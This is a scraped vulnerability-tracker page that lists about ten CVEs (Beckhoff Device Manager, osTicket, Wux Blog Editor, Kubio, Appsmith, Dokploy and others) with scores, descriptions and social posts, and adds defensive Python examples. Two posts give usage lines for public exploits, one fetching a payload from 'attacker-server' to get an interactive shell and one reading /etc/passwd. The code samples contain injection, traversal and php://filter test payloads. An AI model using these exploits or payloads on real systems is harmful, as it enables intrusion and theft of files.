
Overview

  • Beckhoff Automation
  • Beckhoff.Device.Manager.XAR

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
0.02%

KEV

Description

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

Statistics

  • 2 Posts

Last activity: 14 hours ago

Fediverse

🟠 CVE-2025-41727 - High (7.8)

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 14h ago

VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

certvde.com/en/advisories/vde-

beckhoff.csaf-tp.certvde.com/.

  • 15h ago

Overview

  • Beckhoff Automation
  • Beckhoff.Device.Manager.XAR

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (8.8)
EPSS
0.18%

KEV

Description

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within privileged processes.

Statistics

  • 2 Posts

Last activity: 14 hours ago

Fediverse

🟠 CVE-2025-41726 - High (8.8)

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 14h ago

VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager

The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
CVE-2025-41726, CVE-2025-41727, CVE-2025-41728

certvde.com/en/advisories/vde-

beckhoff.csaf-tp.certvde.com/.

  • 15h ago

Overview

  • Veeam Backup & Replication

10 Mar 2023
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
83.53%

Description

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 14 hours ago

Bluesky

JobTwo from VulnLab now on HackTheBox is the sequel to Job from VulnLab. Phishing with Word macros, hMailServer database decryption with a known Blowfish key, password cracking, and CVE-2023-27532 in Veeam Backup & Replication for SYSTEM.
  • 14h ago

Overview

  • Enhancesoft
  • osTicket

12 Jan 2026
Published
22 Jan 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
4.28%

KEV

Description

Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled.
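The description above boils down to one check that was missing: rich text that a guest submitted must not carry resource references the PDF renderer will resolve on the server, and `php://filter/...` is exactly such a reference. The following is an added example (not osTicket's or mPDF's code) of a gate to run over ticket HTML before it reaches the PDF generator. It assumes the renderer resolves `src`/`href`/`background`/`poster`/`data` attributes and CSS `url()` values; the attribute list and the sample ticket are constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Attributes an HTML-to-PDF renderer such as mPDF treats as resource references.
# This list is an assumption for the example, not osTicket's own sanitizer config.
RESOURCE_ATTRS = {"src", "href", "background", "poster", "data"}
# The only schemes a remotely submitted ticket body may legitimately reference.
ALLOWED_SCHEMES = {"http", "https"}

_SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)
_CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)


def classify_ref(value: str) -> Optional[str]:
    """Return a reason if `value` is not a plain http(s) or relative reference, else None."""
    match = _SCHEME_RE.match(value)
    if not match:
        return None  # relative reference: no scheme, so no stream wrapper can hide here
    scheme = match.group(1).lower()
    if scheme in ALLOWED_SCHEMES:
        return None
    if scheme == "php":
        return "php stream wrapper"
    return f"disallowed scheme {scheme}"


class _RefCollector(HTMLParser):
    """Walks the rich text and records every resource reference that is not http(s)."""

    def __init__(self) -> None:
        # convert_charrefs=True (the default): &#112;hp:// is decoded before we see it,
        # so entity-encoded scheme names do not slip past the check.
        super().__init__()
        self.findings: List[Tuple[str, str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # HTMLParser already lower-cases attribute names
            if value is None:
                continue
            if name in RESOURCE_ATTRS:
                reason = classify_ref(value)
                if reason:
                    self.findings.append((tag, name, value, reason))
            elif name == "style":
                for url in _CSS_URL_RE.findall(value):
                    reason = classify_ref(url)
                    if reason:
                        self.findings.append((tag, "style", url, reason))


def find_dangerous_refs(html: str) -> List[Tuple[str, str, str, str]]:
    """(tag, attribute, reference, reason) for every reference that must not reach the renderer."""
    collector = _RefCollector()
    collector.feed(html)
    collector.close()
    return collector.findings


def is_safe_for_pdf_export(html: str) -> bool:
    """Gate to run before handing ticket HTML to the PDF generator."""
    return not find_dangerous_refs(html)


# Constructed sample of a malicious ticket body (not taken from the advisory).
SAMPLE_TICKET = (
    "<p>Printer is broken.</p>"
    '<img src="php://filter/convert.base64-encode/resource=/etc/passwd">'
)

if __name__ == "__main__":
    for tag, attr, ref, reason in find_dangerous_refs(SAMPLE_TICKET):
        print(f"<{tag} {attr}={ref!r}>: {reason}")
```

The check is deliberately an allowlist on the scheme rather than a blocklist of `php://`: `file://`, `phar://` and any wrapper added later fail the same way, and relative references (no scheme at all) are what a legitimate inline attachment looks like.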

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 16 hours ago

Fediverse

The detection of osTicket systems openly reachable from the internet has been improved. As a result, we currently know of around 1,700 systems at German network operators.

Of these, 22% run the current version 1.17.7 or 1.18.3, which closes the vulnerability CVE-2026-22200.

50% run outdated versions 1.17.x or 1.18.x.

28% run versions 1.9 to 1.16, which are no longer supported by the vendor.

  • 16h ago

Overview

  • jurredeklijn
  • Wux Blog Editor

26 Oct 2024
Published
23 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
81.47%

KEV

Description

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
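"Insufficient file type validation" is the whole bug class here. As an added example (not the plugin's code; the accepted extensions, magic bytes and sample inputs are constructed for it), this is the validation an image-upload handler needs: extension allowlist, no double extensions, content bytes matching the claimed type, no PHP open tag in an otherwise valid image, and a server-generated file name.

```python
import os
import secrets
from typing import Tuple

# Extensions the upload endpoint is meant to accept (assumed for this example).
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "webp"}
# Leading bytes each accepted type must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "webp": (b"RIFF",),  # bytes 8..12 must additionally read b"WEBP"
}
PHP_TAGS = (b"<?php", b"<?=", b'<script language="php"')


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (True, stored_name) if the upload may be saved, else (False, reason)."""
    # Drop any client-supplied directory component (../, C:\, ...).
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False, "no extension"
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False, f".{ext} is not an image extension"
    # shell.php.png: Apache configured with AddHandler for .php can execute a file
    # that has .php as any of its extensions, so multi-dotted names are refused.
    if "." in stem:
        return False, "multiple extensions"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if ext == "webp" and data[8:12] != b"WEBP":
        return False, "content does not match extension"
    # Image/PHP polyglots pass the magic check; refuse anything carrying a PHP open tag.
    if any(tag in data for tag in PHP_TAGS):
        return False, "embedded PHP tag"
    # Never reuse the client name: store under a random name with the verified extension.
    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs for the example.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_FILE = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    for name, data in [("photo.png", GOOD_PNG), ("cmd.php", PHP_FILE),
                       ("cmd.php.png", GOOD_PNG), ("cmd.png", PHP_FILE)]:
        print(name, check_upload(name, data))
```

The random stored name also removes the second half of the exploit chain in the post below: an attacker who cannot predict the file name has nothing to request, even if some other check is later weakened.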

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 7 hours ago

Fediverse

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: github.com/JoshuaProvoste/0-cl

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

  • 7h ago

Overview

  • extendthemes
  • Kubio AI Page Builder

28 Mar 2025
Published
28 Mar 2025
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
54.35%

KEV

Description

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via the kubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
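Local File Inclusion of this shape comes from letting a request value decide which file is loaded. The following is an added example, not the plugin's code: the vulnerable resolution next to a hardened one that first requires a plain identifier and then confirms the resolved path still lies under the template root. The template directory and the `.php` suffix are assumptions for the example.

```python
import os
import re
from typing import Optional

# Constructed template directory for the example; the plugin's real layout is not on the page.
TEMPLATE_DIR = "/srv/wp/wp-content/themes/example/templates"
# Template names are plain identifiers: no dots, slashes, NUL bytes or empty strings.
TEMPLATE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")


def vulnerable_resolve(template_dir: str, name: str) -> str:
    """The LFI shape: the request value goes straight into the path that gets included."""
    # os.path.join discards template_dir entirely when name is absolute,
    # and normpath happily walks '..' out of the directory.
    return os.path.normpath(os.path.join(template_dir, name))


def safe_resolve(template_dir: str, name: str) -> Optional[str]:
    """Return an absolute path inside template_dir, or None if the request is not a template."""
    if not TEMPLATE_NAME_RE.fullmatch(name):
        return None
    base = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".php"))
    # Second line of defence: even if the name check is loosened later,
    # the resolved path (symlinks and '..' collapsed) must stay under the root.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for requested in ["header", "../../../../../../../../etc/passwd", "/etc/passwd", "header.php"]:
        print(f"{requested!r}: vulnerable -> {vulnerable_resolve(TEMPLATE_DIR, requested)}"
              f" | safe -> {safe_resolve(TEMPLATE_DIR, requested)}")
```

Where the set of templates is fixed, a dictionary lookup from request value to file is simpler still and removes path handling from the request path entirely; the containment check above is for the case where templates are discovered on disk.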

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 7 hours ago

Fediverse

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: github.com/fumioryoto/CVE-2025

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u example.com -f /etc/passwd

  • 7h ago

Overview

  • appsmithorg
  • appsmith

12 Jan 2026
Published
13 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.7)
EPSS
0.03%

KEV

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially leading to account takeover. This vulnerability is fixed in 1.93.
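The failure the description names is a request header deciding where an out-of-band link points. As an added example (not Appsmith's code), the pre-fix behaviour is shown beside a hardened base-URL selection: a configured default, with an exact-match allowlist for deployments that genuinely serve more than one origin. The configured URL, the allowlist, the reset path and the header dictionary are all assumptions for the example.

```python
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Deployment configuration: assumed values for this example, not Appsmith config keys.
CONFIGURED_BASE_URL = "https://appsmith.example.com"
ALLOWED_ORIGINS = {"https://appsmith.example.com", "https://admin.example.com:8443"}


def normalize_origin(origin: str) -> Optional[str]:
    """Canonicalise an Origin value to scheme://host[:port], or None if it is not one."""
    parts = urlsplit(origin.strip())
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.path not in ("", "/") or parts.query or parts.fragment or parts.username:
        return None  # a real Origin never carries a path, query or credentials
    try:
        port = parts.port
    except ValueError:
        return None
    default_port = 443 if scheme == "https" else 80
    suffix = "" if port in (None, default_port) else f":{port}"
    return f"{scheme}://{parts.hostname.lower()}{suffix}"  # hostname is already lower-cased


def vulnerable_base_url(headers: Mapping[str, str]) -> str:
    """Pre-1.93 behaviour as described: the request's Origin becomes the link base."""
    return headers.get("Origin", CONFIGURED_BASE_URL)


def safe_base_url(headers: Mapping[str, str]) -> str:
    """Only an exact allow-listed origin may override the configured base; anything else is ignored."""
    origin = headers.get("Origin")
    if origin:
        canonical = normalize_origin(origin)
        if canonical in ALLOWED_ORIGINS:
            return canonical
    return CONFIGURED_BASE_URL


def build_reset_link(base_url: str, token: str) -> str:
    # The path is hypothetical; only the host part matters for the token leak.
    return f"{base_url.rstrip('/')}/user/resetPassword?token={token}"


def link_host(link: str) -> str:
    return urlsplit(link).hostname or ""


if __name__ == "__main__":
    # Constructed request: an attacker triggers a reset for the victim with their own Origin.
    attacker_request = {"Origin": "https://evil.example"}
    print("vulnerable:", build_reset_link(vulnerable_base_url(attacker_request), "tok123"))
    print("fixed:     ", build_reset_link(safe_base_url(attacker_request), "tok123"))
```

Note what the allowlist compares: a canonical `scheme://host[:port]`, never a prefix or substring, so `https://appsmith.example.com.evil.example` and `https://appsmith.example.com@evil.example` both fall back to the configured URL.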

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 6 hours ago

Fediverse

‼️ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection

GitHub: github.com/MalikHamza7/CVE-202

CVSS: 9.6

Writeup: resecurity.com/blog/article/cv

  • 6h ago

Overview

  • curl
  • curl

07 Nov 2025
Published
10 Nov 2025
Updated

CVSS
Pending
EPSS
0.02%

KEV

Description

curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl from detecting MITM attackers and more.

Statistics

  • 1 Post

Last activity: 15 hours ago

Bluesky

🔍 Lambda Watchdog detected that CVE-2025-10966 is no longer present in latest AWS Lambda base image scans. https://github.com/aws/aws-lambda-base-images/issues/371 #AWS #Lambda #Security #CVE #DevOps #SecOps
  • 15h ago

Overview

  • ixray-team
  • ixray-1.6-stcop

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
Pending

KEV

Description

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop. This issue affects ixray-1.6-stcop: before 1.3.

Statistics

  • 1 Post

Last activity: 10 hours ago

Fediverse

🔴 CVE-2026-24832 - Critical (9.8)

Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop. This issue affects ixray-1.6-stcop: before 1.3.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 10h ago

Overview

  • Dokploy
  • dokploy

28 Jan 2026
Published
28 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.9)
EPSS
Pending

KEV

Description

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameters are directly interpolated into shell commands without sanitization, allowing authenticated attackers to execute arbitrary commands on the host server. Version 0.26.6 fixes the issue.
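"Directly interpolated into shell commands" is the bug; the fix is to never let a request value reach a shell parser at all. The following is an added example (not Dokploy's code, which is TypeScript) showing the injectable string form beside a handler that validates `containerId` against the character set Docker itself uses for names and IDs, maps `activeWay` through an allowlist, and hands an argv array to a no-shell spawn. The exact `docker exec` command and the meaning of `activeWay` as a shell choice are assumptions for the example.

```python
import re
import shlex
from typing import List, Tuple, Union

# Docker container names match [a-zA-Z0-9][a-zA-Z0-9_.-]+ and IDs are hex; both fit
# this pattern and none of the shell metacharacters (; | & $ ` ( ) space) do.
CONTAINER_ID_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,127}")
# Assumed meaning of activeWay: which shell to start inside the container.
ALLOWED_SHELLS = {"bash": "/bin/bash", "sh": "/bin/sh"}


def vulnerable_command(container_id: str, active_way: str) -> str:
    """The injectable shape: request values interpolated into one string a shell will parse."""
    return f"docker exec -it {container_id} {active_way}"


def check_terminal_request(container_id: str, active_way: str) -> Tuple[bool, Union[List[str], str]]:
    """Return (True, argv) for a no-shell spawn, or (False, reason) if the request is malformed."""
    if not CONTAINER_ID_RE.fullmatch(container_id):
        return False, "containerId contains characters Docker would never assign"
    shell = ALLOWED_SHELLS.get(active_way)
    if shell is None:
        return False, "activeWay is not one of the permitted shells"
    # argv form: each element reaches docker as exactly one argument; nothing re-parses it.
    return True, ["docker", "exec", "-it", container_id, shell]


def quoted_command(argv: List[str]) -> str:
    """If a shell is unavoidable (e.g. a pty wrapper that takes a string), quote every argument."""
    return shlex.join(argv)


if __name__ == "__main__":
    # Constructed request: a containerId carrying a command separator.
    evil_id, way = "web; id", "bash"
    print("vulnerable string:", vulnerable_command(evil_id, way))
    print("validated:        ", check_terminal_request(evil_id, way))
    print("quoted fallback:  ", quoted_command(["docker", "exec", "-it", evil_id, "/bin/bash"]))
```

The validated argv is what `subprocess.Popen(argv)` (or Node's `spawn(cmd, args)` without `shell: true`) should receive; the `shlex.join` fallback shows that even when a string is required, quoting turns `web; id` into one inert argument rather than two commands.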

Statistics

  • 1 Post

Last activity: 1 hour ago

Fediverse

🔴 CVE-2026-24841 - Critical (9.9)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 1h ago
Showing 11 to 20 of 88 CVEs